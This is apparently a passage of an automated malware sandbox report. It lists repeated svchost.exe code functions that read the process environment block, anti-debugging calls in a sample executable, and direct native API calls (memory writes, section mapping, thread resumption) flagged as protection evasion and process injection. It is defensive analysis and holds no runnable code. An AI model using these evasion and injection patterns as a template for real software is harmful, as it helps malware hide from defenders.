                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h] | 2_2_03C5EBFC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h] | 2_2_03CBCBF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] | 2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] | 2_2_03C40BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_03CE4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03CE4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03CC6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h] | 2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h] | 2_2_03CD8B42
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h] | 2_2_03C28B50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEB50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h] | 2_2_03C2CB7E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h] | 2_2_03D04B00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03C5EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03CF8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h] | 2_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h] | 2_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h] | 2_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h] | 2_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h] | 2_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] | 2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] | 2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h] | 2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h] | 2_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h] | 2_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] | 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h] | 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] | 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h] | 2_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h] | 2_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] | 2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] | 2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h] | 2_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h] | 2_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h] | 2_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h] | 2_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h] | 2_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h] | 2_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h] | 2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h] | 2_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] | 2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] | 2_2_03C34859
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock | 0_2_00426DA1
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0042202E SetUnhandledExceptionFilter | 0_2_0042202E
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_004230F5
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00417D93
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00421FA7

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtClose: Direct from: 0x77462B6C
